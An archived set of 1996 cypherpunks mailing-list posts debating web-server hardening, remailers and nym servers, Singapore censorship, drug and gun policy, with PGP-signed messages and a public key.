>> Write your web site to a CD-ROM and hard-code the base >>directory into the
>> webserver.
>
>A hacker who has root can forcibly unmount the cdrom and mount >another
>directory on that node. Not a good solution.

Hack your system kernel to only allow mounting read-only media to that point. 
Most hackers wouldn't try "hot-patching" the system kernel.  The ones that can
probably have better things to do than hack your page.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 2 Sep 1996 16:12:40 +0800
To: "ichudov@algebra.com>
Subject: Re: Bob Dole on Drugs
Message-ID: <19960902052400296.AAA43@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996 11:33:02 -0500 (CDT), Igor Chudov @ home wrote:

>http://allpolitics.com/news/9608/31/radio.addresses/
>
>... snip ...
>
>   Dole, who returned to Washington for Labor Day
>   weekend, also pledged to use the White House as a
>   bully pulpit to promote the "moral message"
>   against drugs and to criticize what he called the
>   entertainment industry's glamorization of drug use.
>
>   On Sunday, he is to address the convention of the
>   National Guard Association of the United States
>   during which he's expected to propose that the
>   military be enlisted to assist in a renewed war on
>   drugs. 

This actually makes a lot of sense; if you've decided on an all-out war on
drugs, doing it right is *much* better than some sort of weenie effort like
we've got.  I liked Robert Heinlein on immigration "If we're going to stop
immigration build a Berlin style wall complete with alligators in the moat. 
Otherwise give up the pretense; nothing is more expensive or less useful than a
wall that isn't."  (very loosely paraphrased)

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 2 Sep 1996 16:18:42 +0800
To: "Igor Chudov" <wb8foz@nrk.com>
Subject: Re: Moscowchannel.com hack
Message-ID: <19960902052808718.AAA203@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996 12:22:40 -0500 (CDT), Igor Chudov @ home wrote:

>> > > Write your web site to a CD-ROM and hard-code the base directory into the
>> > > webserver.
>> > 
>> > A hacker who has root can forcibly unmount the cdrom and mount another
>> > directory on that node. Not a good solution.
>> 
>> Real hard disks such as RL02's & RK07's have WRITE DISABLE
>> switches....
>> 
>
>You can't mount the whole Unix read-only, so there will always be a place
>to put the hacked web page, and then mount that place over DocumentRoot.
If you had enough RAM in the machine, you could disable swapping, send all log
files to /dev/nul (or /dev/lp0), run *only* a web server or anything else that
can avoid writing to disk (probably no CGI, etc).  It wouldn't be too
interesting, but then you probably don't want much happening on your web server
anyway. You could even wire that write-disable switch or jumper into a
keyswitch on the main console.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 16:14:55 +0800
To: qut@netcom.com (Dave Harman OBC)
Subject: Re: Silenced Machine Guns Are Safer Than TWA
Message-ID: <ae4fbf0e0602100498ed@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:33 AM 9/2/96, Skippy wrote:

>Contrary to popular fiction, ALL firearms have been permanently
>registered since the 1968 Gun Control Act.  The media monopoly lies when
>they say the contrary.

Nope. Gun sales between individuals without any paperwork were fully legal
in some places until recently (and may still be fully legal...I can only
speak of California).

>From 1974 until a couple of years ago, I bought and sold a dozen or more
rifles, handguns, and even Evil Assault Weapons, mostly through fully legal
gun shows. I even sold a .357 Smith to some guy, made a joke about how
great these gun shows were and how great it was to be able to just take
cash and hand over a gun without any paperwork...the guy laughed and said
he was a San Jose cop. I felt nervous for a few seconds, but quickly
realized there was no law *I* was breaking, so I laughed too.

Most of these guns I kept no records on, nor did any laws say I had to.

(A few years ago it became necessary for even private citizen-units to
obtain the proper firearms transfer papers from the gubment. I wanted to
sell a laser-equipped Heckler & Koch SP-89 without creating a paper trail
(as I'd not had one when I acquired the piece a few years earlier), so a
friend of mine used his friendly neighborhood libertarian FFL dealer, who
has a policy that the stack of transfer forms he is required to keep on
file will mysteriously burn up if the Feds ever seek out his records. (Who
knows if he'll abide by this policy, but the point is that there are
literally tens of thousands of these "kitchen table FFL dealers," and no
computerized filing of records. This is one reason I quit the NRA: they are
advocating the "instant check." Such an instant check would mean massive
computerization of all files, and of course cross-referencing to files on
citizens. This would be much worse than the "paper chaos" of stacks of
firearms paperwork sitting in dusty filing cabinets. I'll take a 10-day
ineffectual waiting period to a Big Brother database of all purchasers.)

>BTW, I muse that the issue of guns, drugs and censorship make an
>excellent litmus test for libertarians: either you support the
>legalization of, all of, or your a fake.

I'm not sure what the "legalization of censorship" would mean, though I
support the right of anyone to screen out what they choose not to read or
view. And I support the right of companies to decide what materials to buy,
have viewed by employees, etc. (So if the "Valley Lesbigays" want to show a
tape at Hewlett-Packard, H-P can just say "Nope--we're not interested.)

I fully support legalization of all drugs, all guns, and am unalterably
opposed to any form of government censorship.

Does this mean I pass or flunk the litmus test?

(He said acidly.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cyber Thrill <bobs@ns.net>
Date: Mon, 2 Sep 1996 16:18:25 +0800
To: cypherpunks@toad.com
Subject: desubscribe
Message-ID: <199609020550.WAA06206@tomcat.ns.net>
MIME-Version: 1.0
Content-Type: text/plain


desubscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 2 Sep 1996 13:32:32 +0800
To: cypherpunks@toad.com
Subject: Re: It is good that anon.penet.fi has been closed!
In-Reply-To: <199609012217.RAA00801@manifold.algebra.com>
Message-ID: <Pine.LNX.3.95.960901225356.1389C-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Sep 1996, Igor Chudov @ home wrote:

> I believe that Private Idaho is a cypherpunks remailer client for Windows.

True.  But it is a seperate program from email clients which means that anyone
wanting to use Private Idaho has to download it, install it, and learn how to
use it in conjunction with one's email program.  Most people who may have a
need for anonymity have probably never heard of PGP or Private Idaho.  I
think that until remailer functions are actually built into the programs that
people use, remailer use will be rare.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMipNqizIPc7jvyFpAQFy0Qf+LbMgy3PBJ+ipGbxblKbjEm09aiziLEpD
p7JCudf6TrBUdF+2PwTdxK/sOCITE9lTwbycAgeCvEYNUJEbsR3a6ix5fxbQuF8p
Y9/tEbLVESUz0/+UthVnBasbFsCOzHV+ztlIRIk8SEEJKxsu8cNRZqcjaAqH5Q1A
dmBKZ9KGQWPNuc5oLfqahyzroa8kAG59HSDm+ntV9fwduKNi8wSV6WFmA2s9pnZa
+yRRXmSm4PkWVXgNdQCosTTcD1enSIBcH2WAQu1jpDZbbs6+6v1KvdPa5+WOvTs3
kpBfFBlsmVkWJS63ouqDb7yihoq/qZvhyE2Fske8uVYh9M5Ffn9AKg==
=md6D
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 2 Sep 1996 13:36:10 +0800
To: cypherpunks@toad.com
Subject: Re: It is good that anon.penet.fi has been closed!
In-Reply-To: <Pine.LNX.3.95.960901161500.520A-100000@gak>
Message-ID: <199609020313.XAA04501@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text


> headers.  Many people just don't want to deal with cpunk remailers.  OTOH, I
> agree that this might actually force many people with Penet addresses to learn
> about more secure remailers.  In this way, the closing of anon.penet.fi could
> be looked upon as a Good Thing.  However, as long as there is no easy way for
> Windoze and Mac users to use secure remailers, users will sooner resort to
> fake-mailing then learning how to use cpunk remailers.  People that need a
> pseudonym address to use on various support groups can get them from other,
> equally insecure, remailers.

I've put up a list of remailer front ends, sorted by platform, at

http://yakko.cs.wmich.edu/~frogfarm/free/crypt.html#private

I welcome all additions. Right now, I have links to Private Idaho (Windows),
Yet Another NewsWatcher (Mac), and PGPMR/2 for OS/2 (requires MailReader/2).

Nym servers and cpunk remailers are poised to take off, if those who wish to
use them are capable of learning. The rest of us can either try to teach 'em
in a non-condescending manner, or continue to work on front end utilities.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
"We think people like seeing somebody in a uniform on the porch."  -US Postal
spokeswoman, quoted in AP 1/27/96. I don't know about you, but the only folks
I know who'd enjoy seeing someone in uniform on their porch are leathermen...
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 14:33:32 +0800
To: enzo@ima.com (Enzo Michelangeli)
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <Pine.LNX.3.91.960902103728.10553B-100000@ima.net>
Message-ID: <199609020417.XAA03139@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Enzo Michelangeli wrote:
> On Sun, 1 Sep 1996 ichudov@algebra.com wrote:
> > James Seng wrote:
> > > Most importantly, the move to censor certain WWW site actually comes as a 
> > > relieve to many people, especially parents who worried about the bad 
> > > influence of it. We can go into the same discussion about whose 
> > > responsibilty it is but before you do that, please bear in mind that this 
> > > is Singapore.
> > 
> > America is much less different from Singapore in that respect than
> > you might think.
> 
> Actually, it is. I've been living in South-East Asia for almost one
> decade now, and I can tell you that most citizen are more socially
> conservative than their governments. 

... snippity snip ...

>                                                IMHO, the present measures
[in Singapore]
> represent more a gesture of appeasement to concerned social conservatives,
> not differently from the CDA in the US, than an attempt to control the
> flow of information.

Ummm, sounds pretty close to what we have here...

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 2 Sep 1996 13:45:52 +0800
To: cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <Pine.BSF.3.91.960902061444.12103A-100000@icg.irdu.nus.sg>
Message-ID: <Pine.LNX.3.95.960901230817.1485A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Sep 1996, James Seng wrote:

> Now, what makes you think that citizen of Country A has the power or 
> rights to tell politicians of Country B what to do and what they cannot do?
> Just wondering.

I have every right as a citizen of country A to tell politicians of country B
what they should or shouldn't do.  This isn't about American Ideology; it's
about natural rights.  Politicians of country B can refuse to listen to me or
attempt to prevent my corrupt ideas from polluting the minds of its citizens,
but they won't succeed very well with the latter.  Of course, politicians may
be satisfied with making sure that only the most determined citizens will be
able to access information they don't want citizens to access, but as
technology progresses, it will become much more difficult to prevent this
information from spreading to the masses.

> 
> ps: Sorry for the off-topic discussion.

Cpunks is certainly not the best place to be discussing free speech.  However,
the link between free speech and the spread of cryptographic technology is too
close to completely overlook.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMipSASzIPc7jvyFpAQFYyAgAuy7FvTpGHqYHi9zw3FMiea2tLnYVWPU6
D6VrGvN5NxRtTE8yW3eKrc1iU/0jQIVxHtUhHcodbPfvGqEtwuZKKbbknNj5GmzS
pmhcYPguXDwlXL4m3IjxEvhPg7GZ7tjbhXlPK7ADu0EHxvjwesAcrKyCPddu0i9U
e83bo3Q4vBT75WPVpSI1i6jJmC7ql4s3GZVvP2Qf6hzvu9fwSKbAra0ZLBFVKf25
WKwNK2eTVBcQOYytwXOQmdSV/hgFB/Y2T6+PHgnAjaDVeX3WqUuxggk6DpBY2V8g
bORwsuZyweJviVZIOjbLx6RDeNJQWWSjUCojHvJyKzqffg23Fi8bAw==
=+23m
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 17:01:13 +0800
To: cypherpunks@toad.com
Subject: Re: Free Speech and List Topics
Message-ID: <ae4fcb1f0002100476d7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:17 AM 9/2/96, qut wrote:

>About the need for limits for anonymity, guess what brought that on?
>Crime?  Yes!  The crime of the media monopoly violating the anti-trust
>acts, because people are ignorant enough to trust the mass media for
>their news.

No self-respecting Cypherpunk thinks the Antitrust Act and related acts are
worthy of enforcement.

(Think of how the technology we support will tend to allow new avenues for
price collusion, interlocking directorates, new forms of business combines,
unreadable secure communications with foreign competitors, and so on, all
things the Antitrust regulators are already growing worried about.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 2 Sep 1996 15:42:14 +0800
To: cypherpunks@toad.com
Subject: PGPCrack for DOS
Message-ID: <Pine.LNX.3.95.960901232832.1485B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There is now a DOS version of pgpcrack.  It's available at
http://www.voicenet.com/~markm/pgpcrack.html.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMipT5yzIPc7jvyFpAQE8Ewf+J7x0km0xcGZM32c4clmFJ5I9z/bAj6bL
ryXS1BNDBbC72HuJWQPUeqDc0xEc6uyjCc0iytfBL0VqwjlLKCb7KZtxgP7gOlf6
T12/ZNQZwGy3PeClLthQRqQ0fjUtVs4mXWp+sDnAAClI6J+xEL/cBdHDD5tREngM
ufDwueSAwFPQQE/adpS0E3alHj1XqdHMam5s60SGpsZyknnUhnUiAIc2w2CdmjJU
5jywEOosiMcbvYqhBaSuy3S53Pfjh07wEFfXp0t9CvvsJY13ipIW6jvgQgVYQL6u
0f1ob7CkwxiD/z598aXmmCc4Nmn0pFg9Zvqw9xLcs88s4GaGsH15gw==
=zGl8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 2 Sep 1996 17:01:46 +0800
To: James Seng <jseng@pobox.org.sg>
Subject: Encourage Singapore To Come Out Of the Stone Age
Message-ID: <199609020630.XAA20578@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:06 AM 9/2/96 +0800, James Seng <jseng@pobox.org.sg> wrote:
>Just let to add my comment in regard to this unforuntate discusssion.
>To understand the sitution better, you should not impose America 
>idealogy and perspection on how things to be done to Singapore. 
>Singapore maybe young but there are certain culture too.

While Tim's article title was clearly intended to be provocative,
I think the most unfortunate thing about this discussion is that
we need to have it at all.  Any government, or any individual thug,
that would impose violence on people for saying things that would 
bring it into disrespect deserves no respect at all.  Any government 
that claims to have the god-like wisdom to dictate what's best for
its subjects to hear or what religious ideas to believe doesn't
deserve to be listened to, much less obeyed.   If Singapore's government
and religious leaders want to say "Our ideas are better than American
ideas", and you or I or your neighbor want to listen to them, fine;
maybe some of their ideas are better than some of the many ideas
floating around North America.  But if you or I or your neighbor
want to listen to competing ideas, and even to believe and talk about
competing ideas, neither you nor the government have the right to
stop them - only to refute them with better ideas.

People like Tim and I aren't upset only because we believe that
we know better than you and Lee Kwan Yew how to run Singapore;
free speech is often threatened here in the US and especially Canada.
You mentioned movie ratings - they were invented here partly to
avoid the threat of government censorship.  A few years ago a
prominent right-wing religious/political leader, Jerry Falwell,
put out a "Bill Of Rights For American Families" that included the
right not to hear offensive foreign ideas like Communism.

I agree that Singapore and America have different cultures;
in an environment of free speech, if Singaporeans don't like 
American TV and movies, they won't watch them, and advertisers
will quickly figure this out and try to find TV programs they like.
On the other hand, if a power-hungry government decides that it doesn't
like American TV, forbids business licenses to anyone who broadcasts it,
and jails anyone who broadcasts TV without a business license,
they're more corrupt than a government that forbids business licenses to
anyone who doesn't pay a bribe.  (At least in a kleptocracy,
you can usually print or say what you want if you pay the bribes, 
though my father-in-law's newspaper was once shut down for printing 
that the mayor was taking bribes, and who they were from, and how much.)

>In addition, you need to see the method of censorship deployed in
>Singapore. For press media like papers and magazine, it is done in a
>passive manner. They _do not_ read every issue of every magazine available
>in Singapore. They only do so when there is enough complains. 

This also means you don't know what is safe to print and what isn't.
You have to restrict yourself very strongly, because otherwise
some politically influential person will complain to the government,
and you go to jail.  At least if the government tells you what
the rules are, you know it's safe to say things that don't violate them.

>One more point. They know it is impossible to censor everything. [....]
>his reasoning is "how many people can do it? 10%? 5%? That's fine with us.
>If the people really wans it, they can get it". 

Interesting.  I don't know if this is good or bad, but at least they're
realistic.
It also means that if enough people want information badly enough,
the government may know not to censor it.  On the other hand,
a government that can keep the leader of an opposition political party
in jail for years just because he opposes them is pretty corrupt.

>if you wish to rebuke the points which i mention above, please feel 
>free to do so but do so in the context wrt Singapore culture. 
>Do not impose the general idealogy and culture within 
>your country into your argument. 

The right to speak freely without government thugs shutting you down
and throwing you in jail or killing you is a universal one.  
The ability to get anybody to listen to what you have to say,
on the other hand, is highly dependent both on general culture
and on the interests of the individuals you hope will listen,
as well as on what you have to say and your ability to say it well.

>Now, what makes you think that citizen of Country A has the power or 
>rights to tell politicians of Country B what to do and what they cannot do?
>Just wondering.

Because I have a mouth and a conscience, and they have ears and consciences.  
I certainly have more right to tell a politician in Country B not to
stop his subjects from speaking than he does to order them not to speak.
And if the politicians over here are wrong, which they often are,
you've got the right to tell them that too.  Of course, the politicians
over here usually won't listen to you, and the politicians over there
either won't listen to me or they'll add my name to the firewall killfile :-)
But it's also safer for me to tell your politicians to behave well than
for you to tell them, since you have to live with them.

>ps: Sorry for the off-topic discussion.

It's not off-topic.  Building tools to prevent censorship is 
distinctly on-topic for cypherpunks, and an occasional digression into
whether it's a good idea is worthwhile.




#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lutz@as-node.jena.thur.de (Lutz Donnerhacke)
Date: Mon, 2 Sep 1996 17:44:39 +0800
To: stewarts@ix.netcom.com
Subject: Re: Pseudonym server: Jenaer Anonymous Service
In-Reply-To: <199609011109.NAA14105@jengate.thur.de>
Message-ID: <m0uxKDP-0003lFC@as-node.jena.thur.de>
MIME-Version: 1.0
Content-Type: text


* stewarts@ix.netcom.com wrote:
> Jenaer Anonymous Service <anon@as-node.jena.thur.de> 
> looks like a high-security pseudonym server.  

Thanks.

> rather than having it arrive directly.  But in return,
> it's pretty secure, since you can only get caught if the
> remailer or its operator are compromised when you request a delivery.

It's strongly recomment to use a reply server to forward your requests to.
The server sends all outgoing messages via mixmaster chains.
(mixmaster@as-node.jena.thur.de can is always the first one in the chain).

The policy of this remailer urges the user to send incoming jobs only via
mixmaster chains. It may be changed to drop incoming jobs which does not
come from the local mixmaster silently.

> I haven't yet checked if how flexible it is about the location
> of Reply-To: in the headers, since some mailers make it difficult
> to paste that in.  

Reply-To: is neccessary to be included in the encrypted message body. All
readable header informations execpt Subject: {help,send} is drop to
/dev/null including the To:, From:, Sender:, Path:, Reply-To: ... lines.

> The public key for the server is signed by Lutz.Donnerhacke@Jena.Thur.De,
> which is in turn signed by  0x3B7F286D, which MIT thinks is an unknown
> signator...


0x3B7F286D is the key of Winfried Mueller, the maintainer and autor of
Religio, an information system anout religious subjects. A lot of
documents fight against Scientology. Try http://Www.thur.de/religio/.

Type Bits/KeyID    Date       User ID
pub  2048/39F37F5D 1996/04/25 Lutz Donnerhacke <Lutz.Donnerhacke@Jena.Thur.De>
                              Lutz Donnerhacke <lutz@dana.de>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzGACKIAAAEIAMSu8OdG/ZNUiN1qc/eobx53oCeOW3iaxWIrK3q9XgBfzHwy
AuwumYmL+mgCFnP7jkmk0Y4mst6UszujK+mplzuqzCox+7mUhBl0swQQ/0Bqg8HX
0lm0oYoTnQoeUMcoqCGcj1PbO8Gm40nlXj6wKHzhWQfIVkvhyzUODEhu/Pr0mf9V
PtjVoWya8qD+LleM6u8GHsGP2bfERUfFDr6cmdtbUg24U/lsenYzzE5kW1VUyFqK
YqRGJoDy1ZQlXIgVG6wULdNcJ96Vc2tEMRMWASvxxS9BJORUC0nRAE6sqBKXiQ93
+x06J3xEaSuCVv9DxyFl8HIQzOtzCdxwOTnzf10ABRG0MEx1dHogRG9ubmVyaGFj
a2UgPEx1dHouRG9ubmVyaGFja2VASmVuYS5UaHVyLkRlPokBFQMFEDG9XE/4w3ah
osUXSQEBgeoH/iA1uhqU3RsqebIgJquaTB2e5m9NfZdD108ctmhbf191IodV+Doz
oWAp9GH9PMhD/vEERoiuwNJCGGCUDooaRXR4ZRh6I8Tb4D+C53uiPqaNKdzjaZTi
gQ3I/odRwpoggWqr5d8SjIG4Hf5ERB39wdMSrzmHpXYJJRdLvVh9tYFhmS1islDB
vAUxAVlnWKk1vLkbn4cSuIrZL53HQ60fBfcK9MVAPelHhi4jh1J3JN8NJk8bsht6
lx5BfdygLN5Mn4FEQ0JveH2kH2xmSoQvHuAjo1YzBJePOoyJgfJ/QcwNx7ZAcewC
HvaogTeALtt0n11q67/1PNOq3/5D+CMqB8iJAJUDBRAxgT1EYH38Rzt/KG0BATIr
BACijD0IjjePaO0ZVU2zk+OChpXmztf512PwIf6nRcdlOC+DtoK/EusXJoUx2lmb
8M8sJiaN9PgCOj21QfbpkEcyCCXdKfpBvtj5g73OruJdSCFV+O9Pts8jEqlTK+zo
we/Rqr/Nd08Sh0dkQ8E0hlpUVgQkGUiBs5T8LNSeV9G8LIkBFQMFEDGACKMJ3HA5
OfN/XQEB/+QH/20sSVx0VZyv6bbX4t37dd8uY0ZmY7ZxAkwTFZD9wgmcpCQ11cTY
2ZiAKZFheSo4HirBtdKKmW9jMl2GuOs/yDT3JUEcFLSdsFEeqy3EzDYCpJDlm+pV
Vd1BidO3phnt6mqbHoKVbwD0+SL6ZxvRzUscnLL3fEDuIepJ4RGlTH6K8cfooDi3
AI6SBPlphO92ZEeVYs/MRCziwhyYHBAZ3ldJJR23V2vlRaB8LO/UhtcZ8aAHXBi2
XbML4sI4qVqvWEeDLe42lAEmlzgm9zzzvjeBHUe2h8kUU/p0KWhnBbRBDLIuoY4Z
lEogVqB2bzYFZ17IWQtsy7VS7X9IcxERg6m0H0x1dHogRG9ubmVyaGFja2UgPGx1
dHpAZGFuYS5kZT6JARUDBRAxhoKJCdxwOTnzf10BAS90CACENM1MPBE4vg9sm7Bq
t7PyUCrO4z0ZGjiVQhAe1e2nzXAWqYbNhg7tpla/eekG146KBq9h7KFd2v3qApyR
cosse0KUiuLEiCNne7wnwgHpe0+g5DEMmqqqkInaErxyDLEa12YVcwWkaESQyJD8
B5pgRyf4G1SuDRnhOL1VY3SaZeo8trzwWWFLapPI4Qy6vzm2/LdtprL52pFuTD3J
f591mHnnIo3FsYEuMBJUxFYw91dO2RfqSQmqCnR7v4B5IE2OElXZZy8co2rHy969
2IM32oJyRJVbj/U3M+EqOSvhsFmqU6muEUkfvNyknyCGyt1hdATSb4QzwPdMKXRC
YTRi
=LDb+
-----END PGP PUBLIC KEY BLOCK-----

> Because you don't get your reply email until you ask to pick it up,
> it does seem easy to abuse; complaints, flames, and mailbombs won't reach you
> if you don't ask for them.  I hope the operator doesn't mind the workload
> of managing the remailer - it looks like a good service, and with
> Julf's remailer shut down, we need more nymservers.

Sure. My nymserver is completely written as a bash script.

-- 
|   Lutz Donnerhacke   +49/3641/380259 voice, -60 ISDN, -61 V.34 und Fax    |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 3 Sep 1996 06:30:16 +0800
To: James Seng <stewarts@ix.netcom.com>
Subject: Re: Encourage Singapore To Come Out Of the Stone Age
Message-ID: <199609021945.MAA05327@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:13 PM 9/2/96 +1000, James Seng wrote:
> What i am saying is that Asian (Singapore)
> values are _DIFFERENT_ from western (America) values.

One of the classic Greek rationalizations for slavery was that Asians
are slaves by nature.

It would seem that you are saying that they were right.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 3 Sep 1996 10:03:59 +0800
To: Alan Horowitz <angelos@gradin.cis.upenn.edu>
Subject: Re: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
Message-ID: <199609021945.MAA05331@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:04 PM 9/1/96 -0400, Alan Horowitz wrote:
> The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone.
>
> If my memory serves, the Iranian jetliner had its squawker turned off, or 
> broken.

Your memory does not serve:  The computers record of the events was:

Computer tells crew:  Civilian jetliner on radar.

Crew expecting an attack by jetfighters, tell computer to shoot it down.

Computer does not put up a bunch of dialogs saying:  "Hey, I think this
is a CIVILIAN airliner, did you get that CIVILIAN airliner, are you quite
sure you want it shot down?  Instead it just shoots it down.

Human error by the American military.  Possibly poor user interface on
the computer.  Possibly indifference to civilian lives by the American
military.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 2 Sep 1996 17:53:04 +0800
To: cypherpunks@toad.com
Subject: Re: It is good that anon.penet.fi has been closed!
Message-ID: <199609020721.AAA21297@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In a challenging article posted 12:33 PM 9/1/96 -0500, 
ichudov@algebra.com (Igor Chudov) wrote:
>Yes, subject says it all. anon.penet.fi was a whole lot worse than
>cypherpunks remailers. It provided clueless users with no real security,
>because it stored return addresses and did not use chaining and
>encryption.

There are different reasons people use remailers, different
amounts of security they need, and different levels of security
that the remailers can provide.  Anon.penet.fi was a Good Thing.
It got a few hundred thousand people thinking about remailers,
and why they want them, and thinking they were good tools.
It helped the public learn that anonymity is useful for real people, 
and helped the public learn that they can't always believe an
email message is from the "person" on the From: line,
and that email and news postings aren't always authentic just
because they come out of a computer :-)

One way to provide privacy is through heavy mathematics;
for some people, and some threats, you need that.
Another way to provide privacy is through a trusted operator
who's willing to put up with a lot of crap to provide the service.
For many people, that's enough - not for people worried about
eavesdroppers and overthrowing governments, but enough for people
talking about their attitudes toward work and sex and drugs who 
don't want their email traced by their employers, nosy neighbors,
or local vice cops.  And part of this security is the willingness
to close down a popular service when it's security is threatened.

One feature that's really needed for many remailer applications
is reply addresses.  Doing that securely with cypherpunks-style 
remailers is hard; doing it securely with trusted-sysop remailers is
much easier, and even then there were occasional bugs, and plain surprises.
In general, anything that knows the return path is vulnerable;
if the person sending the reply knows the destination address,
which doesn't apply to many of the applications,
the remailer system in between can be secure, 
but otherwise you're not "truly secure" - only "pretty good".

Knowing what the users really want to do helps you do it more securely.
>From what I know of remailer history, the main original goal 
of the cypherpunks-style remailer was to provide
security against traffic analysis by eavesdroppers, rather than to
prevent the recipient from knowing the sender's address, though
everybody pretty quickly realized that the latter was an interesting
feature, especially coupled with posting to Usenet.
Learning the differences between what people will really do with
2-way remailers as opposed to 1-way remailers can be done
better with an easy-to-use 2-way remailer like penet.fi
which can get 500,000 (possibly duplicated) users than with
moderately complicated systems like alpha.c2.org or the really
complicated things that may be needed to get better security.

